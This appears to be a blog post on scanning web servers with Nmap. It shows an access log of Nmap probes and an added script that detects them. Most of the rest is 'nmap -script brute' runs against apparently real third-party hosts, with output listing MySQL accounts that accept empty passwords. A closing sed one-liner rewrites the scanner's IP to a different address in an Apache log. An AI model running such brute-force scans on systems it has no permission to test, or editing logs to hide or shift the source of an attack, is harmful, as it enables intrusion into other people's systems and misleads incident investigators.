Posted: . At: 11:26 AM. This was 4 months ago. Post ID: 19031

Scanning websites with Nmap is a lot of fun.


Using Nmap to scan a web server can return some useful information. Below is what an Nmap scan looked like in the web server's access log; the requests made by the Nmap Scripting Engine identify themselves in the User-Agent field. This is very interesting.

10.12.141.56 - - [11/Jan/2024:18:21:23 -0500] "\x16\x03" 400 422 "-" "-"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET / HTTP/1.1" 200 6277 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /~1*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /administrator/index.php HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /wp-login.php HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET / HTTP/1.1" 200 6277 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:25 -0500] "GET /~1/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:25 -0500] "GET /~2*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:26 -0500] "GET /~2/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:27 -0500] "GET /~3*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:27 -0500] "GET /~3/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:28 -0500] "GET /~4*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:29 -0500] "GET /~4/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:29 -0500] "GET /~5*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:30 -0500] "GET /~5/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:31 -0500] "GET /~6*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:31 -0500] "GET /~6/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:32 -0500] "GET /~7*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:33 -0500] "GET /~7/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:33 -0500] "GET /~8*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:34 -0500] "GET /~8/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:35 -0500] "GET /~9*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:35 -0500] "GET /~9/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:36 -0500] "GET /~10*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:37 -0500] "GET /~10/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:37 -0500] "GET /~11*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:38 -0500] "GET /~11/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:39 -0500] "GET /%3f*~11*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:40 -0500] "GET /%3f*~10*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:40 -0500] "GET /%3f*~9*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:41 -0500] "GET /%3f*~8*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:42 -0500] "GET /%3f*~7*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:42 -0500] "GET /%3f*~6*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:43 -0500] "GET /%3f*~5*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:44 -0500] "GET /%3f*~4*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:44 -0500] "GET /%3f*~3*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:45 -0500] "GET /%3f*~2*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:46 -0500] "GET /%3f*~1*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
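
The log entries above can be turned into detection rules. The following is an added example, not part of the original post: it parses Apache combined-format lines and flags the signals visible in this scan (the NSE User-Agent, a TLS handshake sent to the plain HTTP port, the tilde/wildcard .aspx probes, and a burst of 404 responses from one source). The function names, tag names, the 404 threshold and the sample lines (including the 192.0.2.10 visitor) are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict

# Apache combined format: ip ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Tilde/wildcard .aspx paths of the form seen in the log above.
TILDE_RE = re.compile(r'^GET /(?:%3f\*)?~\d+\*?/\*\.aspx', re.IGNORECASE)
NSE_UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64)"  # assumed ordinary visitor

def _line(ip, req, status, ua):
    return f'{ip} - - [11/Jan/2024:18:21:24 -0500] "{req}" {status} 6284 "-" "{ua}"'

# Constructed sample: five lines modelled on the log above, two from an ordinary visitor.
SAMPLE = [
    _line("10.12.141.56", r"\x16\x03", 400, "-"),
    _line("10.12.141.56", "GET / HTTP/1.1", 200, NSE_UA),
    _line("10.12.141.56", "GET /~1*/*.aspx?aspxerrorpath=/ HTTP/1.1", 404, NSE_UA),
    _line("10.12.141.56", "GET /wp-login.php HTTP/1.1", 404, NSE_UA),
    _line("10.12.141.56", "GET /%3f*~11*/*.aspx?aspxerrorpath=/ HTTP/1.1", 404, NSE_UA),
    _line("192.0.2.10", "GET /index.html HTTP/1.1", 200, BROWSER_UA),
    _line("192.0.2.10", "GET /favicon.ico HTTP/1.1", 404, BROWSER_UA),
]

def detect(lines, burst_404=3):
    # Returns {source: sorted list of signals} for sources that tripped a rule.
    tags, not_found, unparsed = defaultdict(set), Counter(), 0
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m:
            unparsed += 1  # count malformed lines instead of dropping them silently
            continue
        ip, req = m["ip"], m["req"]
        if "Nmap Scripting Engine" in m["ua"]:
            tags[ip].add("nse-user-agent")
        if req.startswith(r"\x16\x03"):  # TLS handshake record sent to a plain-HTTP port
            tags[ip].add("tls-hello-on-http-port")
        if TILDE_RE.match(req):
            tags[ip].add("tilde-wildcard-probe")
        if m["status"] == "404":
            not_found[ip] += 1
    for ip, n in not_found.items():
        if n >= burst_404:
            tags[ip].add(f"404-burst:{n}")
    result = {ip: sorted(t) for ip, t in tags.items()}
    if unparsed:
        result["<unparsed>"] = [f"lines:{unparsed}"]
    return result
```

The User-Agent match is the weakest of the four signals because a scanner can send any string there; the request-shape and 404-burst rules still fire when it is changed.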

I was using a brute force script and this made the web server very unhappy. This is an example Nmap brute force scan; it is useful for returning a list of all usernames in a MySQL database if it is exposed to the Internet.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.29.118.12)sudo nmap 91.132.86.243 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 10:21 AEDT
Nmap scan report for 91.132.86.243
Host is up (0.31s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
| ssh-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 43 guesses in 39 seconds, average tps: 1.3
|_  ERROR: The service seems to have failed or is heavily firewalled...
25/tcp    open     smtp
| smtp-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
53/tcp    open     domain
80/tcp    open     http
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
| http-brute:   
|_  Path "/" does not require authentication
110/tcp   open     pop3
| pop3-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 498 guesses in 617 seconds, average tps: 0.7
143/tcp   open     imap
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
443/tcp   open     https
| http-brute:   
|_  Path "/" does not require authentication
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
587/tcp   open     submission
| smtp-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
646/tcp   filtered ldp
993/tcp   open     imaps
|_imap-brute: ERROR: Script execution failed (use -d to debug)
995/tcp   open     pop3s
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 14 guesses in 28 seconds, average tps: 0.5
|_  ERROR: Failed to connect.
10000/tcp open     snet-sensor-mgmt
20000/tcp open     dnp
 
Nmap done: 1 IP address (1 host up) scanned in 641.21 seconds

This is an example of the brute force results. This run found a MySQL instance exposed to the Internet, and the mysql-enum script reported valid usernames on it.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~)-(172.29.123.37)sudo nmap demotrend.com -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 11:01 AEDT
Nmap scan report for demotrend.com (193.111.77.5)
Host is up (0.36s latency).
rDNS record for 193.111.77.5: biricloud.com
Not shown: 893 filtered tcp ports (no-response), 35 filtered tcp ports (admin-prohibited), 61 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
| http-brute:   
|_  Path "/" does not require authentication
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
110/tcp  open  pop3
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 6 guesses in 32 seconds, average tps: 0.2
|_  ERROR: Failed to connect.
143/tcp  open  imap
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
443/tcp  open  https
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
| http-brute:   
|_  Path "/" does not require authentication
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
995/tcp  open  pop3s
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 8 guesses in 33 seconds, average tps: 0.2
|_  ERROR: Failed to connect.
3306/tcp open  mysql
| mysql-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 26 guesses in 314 seconds, average tps: 0.1
| mysql-enum: 
|   Valid usernames: 
|     webadmin:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 183 guesses in 310 seconds, average tps: 0.4
 
Nmap done: 1 IP address (1 host up) scanned in 344.81 seconds

Another brute forcing example.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~)-(172.29.123.37)sudo nmap 85.190.158.85 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 11:10 AEDT
Nmap scan report for 85.190.158.85
Host is up (0.23s latency).
Not shown: 816 filtered tcp ports (no-response), 181 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 10442 guesses in 600 seconds, average tps: 17.3
3306/tcp open  mysql
| mysql-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
8443/tcp open  https-alt
 
Nmap done: 1 IP address (1 host up) scanned in 610.83 seconds

This is how to search and replace an IP address in an Apache log file.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.29.118.12)sed -i "s/10\.12\.141\.56/193.10.128.13/g" log.txt

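That would be a very useful trick for editing an Apache log file. Because of the -i option, sed edits in place, so the changes are written back to the log.txt file; keep an untouched copy of the original if you still need it.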

